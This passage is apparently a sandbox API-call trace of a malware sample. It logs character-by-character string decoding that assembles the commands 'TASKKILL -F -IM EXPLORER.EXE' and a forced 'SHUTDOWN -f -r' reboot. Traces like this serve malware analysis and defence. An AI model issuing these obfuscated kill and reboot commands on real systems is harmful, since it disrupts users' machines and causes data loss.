lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G", lpUsedDefaultChar=0x0) returned 1 [0084.670] VarSub (in: pvarLeft=0x28f64c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0xe56ecc, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0084.670] VarCat (in: pvarLeft=0x28f4ac, pvarRight=0x28f6bc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[", lpUsedDefaultChar=0x0) returned 1 [0084.671] VarSub (in: pvarLeft=0x28f64c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0084.671] VarCat (in: pvarLeft=0x28f4ac, pvarRight=0x28f6bc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\", lpUsedDefaultChar=0x0) returned 1 [0084.672] VarSub (in: pvarLeft=0x28f64c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe56f1c, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0084.672] VarCat (in: pvarLeft=0x28f4ac, pvarRight=0x28f6bc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S", lpUsedDefaultChar=0x0) returned 1 [0084.673] VarSub (in: pvarLeft=0x28f64c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0xe56ecc, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0084.673] VarCat (in: pvarLeft=0x28f4ac, pvarRight=0x28f6bc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V", lpUsedDefaultChar=0x0) returned 1 [0084.673] VarSub (in: pvarLeft=0x28f64c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0084.674] VarCat (in: pvarLeft=0x28f4ac, pvarRight=0x28f6bc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y", lpUsedDefaultChar=0x0) returned 1 [0084.674] VarSub (in: pvarLeft=0x28f64c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0xe56f1c, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0084.674] VarCat (in: pvarLeft=0x28f4ac, pvarRight=0x28f6bc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0084.675] VarSub (in: pvarLeft=0x28f64c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe56ecc, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.675] VarCat (in: pvarLeft=0x28f4ac, pvarRight=0x28f6bc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a", lpUsedDefaultChar=0x0) returned 1 [0084.676] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0084.676] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0084.676] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0084.676] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0084.677] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0084.677] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0084.678] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0084.678] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.678] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0084.678] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.678] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0084.679] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.679] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0084.679] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.679] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0084.679] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.679] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.679] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.680] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0084.680] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.680] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0084.680] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.680] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.680] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.681] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0084.681] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.681] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0084.681] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.681] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0084.682] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.682] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.682] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.682] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.682] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.682] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="X", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0084.683] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.683] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="P", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0084.683] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.683] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0084.683] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.684] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0084.684] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.684] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0084.684] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.684] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.684] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.685] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0084.685] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.685] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.685] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.685] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.686] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.686] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="X", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0084.686] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.686] VarSub (in: pvarLeft=0x28f69c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe3ef3c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.686] VarCat (in: pvarLeft=0x28f6cc, pvarRight=0x28f4dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.687] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0084.687] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U", lpUsedDefaultChar=0x0) returned 1 [0084.687] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0084.687] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.687] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0084.688] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.688] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0084.688] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.688] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0084.688] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.688] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0084.689] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.689] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0084.689] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.689] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0084.689] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.689] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.690] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.690] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe56f6c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0084.690] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.690] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0084.690] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.690] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.691] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.691] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0084.691] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.691] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.691] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.691] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.692] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.692] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0084.692] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.692] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0084.692] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.693] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 